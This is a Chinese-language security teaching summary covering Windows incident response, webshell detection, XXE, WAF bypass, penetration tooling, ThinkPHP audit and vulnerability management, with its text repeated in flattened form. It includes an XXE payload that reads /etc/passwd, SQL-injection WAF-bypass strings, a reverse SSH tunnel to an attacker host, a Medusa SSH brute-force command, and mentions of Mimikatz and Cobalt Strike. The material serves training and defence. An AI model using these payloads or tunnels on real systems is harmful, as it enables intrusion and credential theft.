专注Web及移动安全[红日安全86期]
字数 1853 2025-08-18 11:38:41

Web及移动安全综合教学文档

一、应急响应与Windows安全

1.1 Windows应急响应处置流程

  • 日志分析:重点检查安全日志(Event ID 4624/4625登录事件)、系统日志和应用日志
  • RDP漏洞防护:针对CVE-2019-0708(BlueKeep)的修复方案:
    • 安装微软官方补丁KB4499175/KB4499181
    • 禁用RDP服务(非必要情况下)
    • 启用网络级认证(NLA)
  • 入侵检测
    • 异常进程检查(特别是位于temp目录的可执行文件)
    • 可疑服务排查
    • 计划任务审计
    • 注册表自启动项检查

1.2 主机入侵检测技术

  • HIDS架构
    • 数据采集层(文件监控、进程监控、网络监控)
    • 分析引擎(规则匹配、行为分析)
    • 响应处置模块
  • 检测指标
    • 文件完整性变化(重要系统文件哈希值)
    • 异常账号活动(非工作时间登录)
    • 特权账号异常使用

二、Web安全攻防

2.1 WebShell检测与防御

  • 流量特征
    • 固定User-Agent头(如"ant"、"rebeyond")
    • Base64编码参数频繁出现
    • 非常规HTTP方法(PUT/DELETE)
    • 异常Cookie字段
  • 检测方法
    • 静态特征检测(文件哈希、关键词)
    • 动态行为分析(文件操作、命令执行)
    • 网络流量分析(长连接维持)

2.2 XXE漏洞攻防

  • XML基础知识
    <!-- 外部实体引用示例 -->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
  • 攻击类型
    • 文件读取
    • SSRF攻击
    • 拒绝服务
  • 防御措施
    • 禁用DTD和外部实体
    • 使用JSON替代XML
    • 输入过滤(关键词)

2.3 注入攻击绕过技术

  • 云锁绕过方法
    • 注释分割:UNION/**/SELECT
    • 空白符替代:UNION%0bSELECT
    • 大小写混合:uNiOn SeLeCt
    • 等价函数替换:concat()→make_set()
  • 防御建议
    • 参数化查询
    • 最小权限原则
    • WAF规则深度防御

三、渗透测试技术

3.1 内网穿透技术

  • 反向SSH隧道
    # 攻击机执行(建立转发)
ssh -R 3389:target_ip:3389 user@attacker_ip

# 本地连接
rdesktop localhost:3389
  • Cobalt Strike利用
    • MS17-010漏洞利用模块
    • 横向移动技术:
      • Pass-the-Hash
      • 票据传递
      • WMI远程执行

3.2 渗透测试实战要点

  • 信息收集阶段
    • Webkiller工具使用: 
      python webkiller.py -d example.com -a
    • 子域名枚举
    • 端口服务识别
  • 提权技术
    • 内核漏洞利用(CVE-2019-1458)
    • 服务配置错误
    • 凭证转储(使用Mimikatz)

四、安全工具集

4.1 信息收集工具

  • Medusa爆破工具
    medusa -h target_ip -u username -P wordlist.txt -M ssh
  • Trigmap(Nmap封装)
    python trigmap.py -i 192.168.1.0/24 -f full_scan

4.2 漏洞扫描工具

  • Killshot功能
    • 子域名爆破
    • 目录扫描
    • XSS/SQLi自动化检测
  • 勒索病毒解密
    • TeslaCrypt解密工具
    • GandCrab解密方案
    • 文件恢复技术

五、代码审计技术

5.1 ThinkPHP漏洞分析

  • 文件包含漏洞
    • 漏洞触发点:\think\Loader::include
    • 利用条件:控制器名可控
    • 修复方案:过滤../等路径穿越字符
  • 代码执行漏洞
    // 危险函数调用链
Request::input()  filterValue()  call_user_func()
    • 防御措施:禁用危险函数、严格参数过滤

5.2 安全开发规范

  • 输入验证原则
    • 白名单优于黑名单
    • 数据类型严格校验
    • 边界值检查
  • 安全函数使用
    • 数据库操作:预处理语句
    • 文件操作:禁用动态路径
    • 命令执行:避免shell注入

六、企业安全建设

6.1 RASP技术

  • 运行时防护
    • 函数Hook技术
    • 行为分析引擎
    • 上下文关联分析
  • 部署模式
    • Java Agent
    • PHP扩展
    • .NET CLR集成

6.2 数据库审计

  • 审计要点
    • 敏感数据访问
    • 批量数据导出
    • 非工作时间操作
    • 权限变更记录
  • 实现方案
    • 数据库原生审计功能
    • 网络流量解析
    • 代理层审计

七、漏洞预警与响应

7.1 漏洞管理流程

  • 漏洞评估矩阵

    因素 权重
    可利用性 30%
    影响范围 25%
    利用复杂度 20%
    补救难度 15%
    公开程度 10%

  • 补丁管理

    • 测试环境验证
    • 分级部署策略
    • 回滚方案准备

7.2 近期高危漏洞

  • InfluxDB认证绕过
    • 影响版本:<1.7.6
    • 利用方式:/query端点直接访问
  • WebLogic反序列化(CVE-2019-2725)
    • 漏洞组件:wls9_async_response
    • 防护措施:删除组件/升级补丁

本教学文档涵盖了Web及移动安全的核心知识点,建议结合实践环境进行验证测试。安全技术更新迅速,请持续关注最新漏洞动态和防御方案。

Web及移动安全综合教学文档 一、应急响应与Windows安全 1.1 Windows应急响应处置流程 日志分析 :重点检查安全日志(Event ID 4624/4625登录事件)、系统日志和应用日志 RDP漏洞防护 :针对CVE-2019-0708(BlueKeep)的修复方案: 安装微软官方补丁KB4499175/KB4499181 禁用RDP服务(非必要情况下) 启用网络级认证(NLA) 入侵检测 : 异常进程检查(特别是位于temp目录的可执行文件) 可疑服务排查 计划任务审计 注册表自启动项检查 1.2 主机入侵检测技术 HIDS架构 : 数据采集层(文件监控、进程监控、网络监控) 分析引擎(规则匹配、行为分析) 响应处置模块 检测指标 : 文件完整性变化(重要系统文件哈希值) 异常账号活动(非工作时间登录) 特权账号异常使用 二、Web安全攻防 2.1 WebShell检测与防御 流量特征 : 固定User-Agent头(如"ant"、"rebeyond") Base64编码参数频繁出现 非常规HTTP方法(PUT/DELETE) 异常Cookie字段 检测方法 : 静态特征检测(文件哈希、关键词) 动态行为分析(文件操作、命令执行) 网络流量分析(长连接维持) 2.2 XXE漏洞攻防 XML基础知识 : 攻击类型 : 文件读取 SSRF攻击 拒绝服务 防御措施 : 禁用DTD和外部实体 使用JSON替代XML 输入过滤( 关键词) 2.3 注入攻击绕过技术 云锁绕过方法 : 注释分割: UNION/**/SELECT 空白符替代: UNION%0bSELECT 大小写混合: uNiOn SeLeCt 等价函数替换: concat()→make_set() 防御建议 : 参数化查询 最小权限原则 WAF规则深度防御 三、渗透测试技术 3.1 内网穿透技术 反向SSH隧道 : Cobalt Strike利用 : MS17-010漏洞利用模块 横向移动技术: Pass-the-Hash 票据传递 WMI远程执行 3.2 渗透测试实战要点 信息收集阶段 : Webkiller工具使用: 子域名枚举 端口服务识别 提权技术 : 内核漏洞利用(CVE-2019-1458) 服务配置错误 凭证转储(使用Mimikatz) 四、安全工具集 4.1 信息收集工具 Medusa爆破工具 : Trigmap(Nmap封装) : 4.2 漏洞扫描工具 Killshot功能 : 子域名爆破 目录扫描 XSS/SQLi自动化检测 勒索病毒解密 : TeslaCrypt解密工具 GandCrab解密方案 文件恢复技术 五、代码审计技术 5.1 ThinkPHP漏洞分析 文件包含漏洞 : 漏洞触发点: \think\Loader::include 利用条件:控制器名可控 修复方案:过滤 ../ 等路径穿越字符 代码执行漏洞 : 防御措施:禁用危险函数、严格参数过滤 5.2 安全开发规范 输入验证原则 : 白名单优于黑名单 数据类型严格校验 边界值检查 安全函数使用 : 数据库操作:预处理语句 文件操作:禁用动态路径 命令执行:避免shell注入 六、企业安全建设 6.1 RASP技术 运行时防护 : 函数Hook技术 行为分析引擎 上下文关联分析 部署模式 : Java Agent PHP扩展 .NET CLR集成 6.2 数据库审计 审计要点 : 敏感数据访问 批量数据导出 非工作时间操作 权限变更记录 实现方案 : 数据库原生审计功能 网络流量解析 代理层审计 七、漏洞预警与响应 7.1 漏洞管理流程 漏洞评估矩阵 : | 因素 | 权重 | |---|---| | 可利用性 | 30% | | 影响范围 | 25% | | 利用复杂度 | 20% | | 补救难度 | 15% | | 公开程度 | 10% | 补丁管理 : 测试环境验证 分级部署策略 回滚方案准备 7.2 近期高危漏洞 InfluxDB认证绕过 : 影响版本: <1.7.6 利用方式: /query 端点直接访问 WebLogic反序列化(CVE-2019-2725) : 漏洞组件:wls9_ async_ response 防护措施:删除组件/升级补丁 本教学文档涵盖了Web及移动安全的核心知识点,建议结合实践环境进行验证测试。安全技术更新迅速,请持续关注最新漏洞动态和防御方案。